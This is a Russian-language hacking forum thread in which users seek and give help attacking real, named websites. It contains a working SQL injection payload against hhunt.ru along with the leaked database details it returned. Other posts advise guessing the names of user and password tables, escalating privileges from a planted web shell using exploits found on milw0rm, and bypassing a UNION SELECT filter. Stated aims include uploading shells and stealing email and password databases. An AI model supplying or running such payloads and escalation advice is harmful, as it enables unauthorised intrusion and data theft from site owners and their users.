У мну вопрос по SQL (сразу в эту тему не пинать. Я нашел "xspider"ом дыру вот такого типа http://www.site.ru/forum/index.php?showforum=2&prune_day=100&sort_by=Z-A&sort_key=last_post&category1=1'&st=25 Выдает mySQL query error: SELECT COUNT(tid) as max FROM ibf_topics WHERE forum_id=2 and approved=1 and (pinned=1 or last_post > 0) AND category1=1' mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 mySQL error code: Date: Wednesday 07th of May 2008 05:52:48 PM Че с этим добром делать, мне не понятно =(( Просьба помочь...
Zergius, прочитать пару статей по SQL-инъекциям. Их тут очень много, можно даже поиск не юзать, просто зайти в раздел "Статьи". Там всё подробно расписано. з.ы. https://forum.antichat.ru/thread19605.html вот з.з.ы. Если тебе интересно зачем это вообще надо - ну много вариантов: шелл залить, инфу вытащить (базу мыл, пассы и т.п.), заддосить..
Помогите со sql иньекцией сам ковырял не получилось http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* Читал статью тоже так же ниче не получилось
Просто я ни в одной статье такого не вижу, а насчет инфы-это извесный сайт по фотошопу, как пойму как вытащить инфу(учиться как то надо), так админу думаю расскажу... Млин, все равно не догоняю =(((
hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9,10,11,12,13,14/* 4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost Доступа к information_schema нет. К форуму (phpbb) - тоже. Можешь попробовать подбирать названия таблиц вручную. Типа там users, members и тд.
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost да это я сам знаю А как есть какой нибуть автоподбор или чтото в этом роде просто подбирать это долго и мучительно((
Есть проги типа SQL Injection Tool от SQLHACK. Там если я не ошибаюсь можно организовать автоподбор. А вообще где-то тут была тема часто юзаемых имен для таблиц и колумнов. Поищи и проверь если хочешь. Zergius, дай ссылку на сайт. На пальцах никто ничего не объяснит.
ООООООО МДЯЯЯЯ ВОТЬ ЭТО УЖЕ РЕАЛЬНЫЙ ППЦ)))))))) (p.s. наврятли чтото получиться имхо хотя не кто не знает что произойдет) Сор за капс
Вот такое дело, был сайт на нем висел шелл долго, были права на редактирование индекса, потом админ убрал права на запись, какие есть возможные способы поднять права?
мне нужно именно знать какие есть сплойты, какая инфа нужна для того что бы проверить реально ли воспользоватся данным сплойтом, просто хочу что бы все было быстро и оперативно.
Sharingan, знаешь какая ОС? Можно поискать под конкретную версию + сплоит под сервисы, которые крутятся на машине
FreeBSD 6.2-RELEASE-p5 Server: Apache safe_mode: OFF PHP version: 4.4.7 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF если на таком шелл стоит реально ли права поднять?
Сейф мода нет...дас ист гут Вот, поищи тут: http://milw0rm.org/search.php Лучше в поиск вбивать названия демонов
Кто нибудь подскажет как обойти фильтр последовательности union select from? ---------------------------------- читал, но вопрос остался
